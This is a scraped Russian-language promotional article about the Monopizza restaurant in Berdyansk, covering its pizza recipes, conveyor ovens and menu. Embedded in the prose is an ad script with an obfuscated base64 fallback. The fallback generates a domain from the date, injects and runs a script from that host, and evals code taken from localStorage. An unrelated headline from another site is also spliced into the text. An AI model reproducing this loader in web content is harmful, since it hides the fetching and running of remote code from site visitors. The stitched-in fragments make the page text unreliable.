Ресторан Monopizza в Бердянске — настоящая итальянская пицца

Ресторан Монопицца в Бердянске отличается уникальной технологией приготовления всеми любимого итальянского блюда. Заведение находится на Азовском проспекте, 29.

Особенности итальянской рецептуры

Максимальный диаметр традиционного итальянского блюда – 35 см. В состав теста входят:

мука высших сортов;закваска (в некоторых случаях дрожжи);вода;оливковое масло;соль и специи.

Главная особенность итальянской рецептуры — тонкая основа, на которую выкладывают все ингредиенты:

сыр, томаты, зелень, специи;начинки – мясо, овощи, грибы, морепродукты, оливки.

Начинку размещают так, чтобы продукты не перебивали вкус друг друга. Например, в пицце «Четыре сезона» каждая четверть блюда имеет свою начинку, в итоге выпечка идеально сочетает в себе более 7 ингредиентов.

Настоящая итальянская пицца в Бердянске

Во всех ресторанах сети Monopizza для приготовления блюд установлены специальные конвейерные печи. Весь процесс полностью автоматизирован, поэтому время выпекания одной пиццы не превышает 10 минут. Для коржей используют крафтовую муку высшего сорта и закваску вместо дрожжей: так вкусное блюдо становится наиболее полезным. Благодаря тестораскатке основа получается очень тонкой и мягкой, с легкой хрустинкой. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

В меню ресторана можно найти традиционные варианты: «Маргариту», «Папперони», «Маринару». А также и множество оригинальных вкусов начинки:

с грушей и сыром Дор Блю;тунцом и маринованным цукини;крем-сыром и запеченным перцем и др.

Любители мясных сочетаний оценят вариант с прошутто и грушей, «4 мяса», «Фермерскую». В дополнение к пицце выберите закуску, салат, десерт или безалкогольный напиток. Забрать заказ можно самостоятельно в заведении или оформить доставку курьером на дом.

Обзор от бурого: закажем пиццу? - Выкса в курсе Американская пицца

Во время Второй мировой войны известное итальянское блюдо начало набирать популярность в США. Появилась так называемая американская пицца. В США она стала элементом фастфуда, с алаптацией классической рецептуры на более привычные и доступные ингредиенты.

Для пиццы стали использовать дрожжевое тесто, из которого лепешка получается объемной и воздушной. А томатную пасту заменили майонезом, горчицей и другими традиционными для Америки соусами. Начинка блюда также имеет свои отличия: привычные ингредиенты могут сочетаться с нестандартными. Одна из таких пицц – «Гавайская» с добавлением ананаса. «Первооткрывателем» рецепта стал канадец Сэм Панопулос. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/restoran-monopizza-v-berdyanske-nastoyashhaya-italyanskaya-pitstsa/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top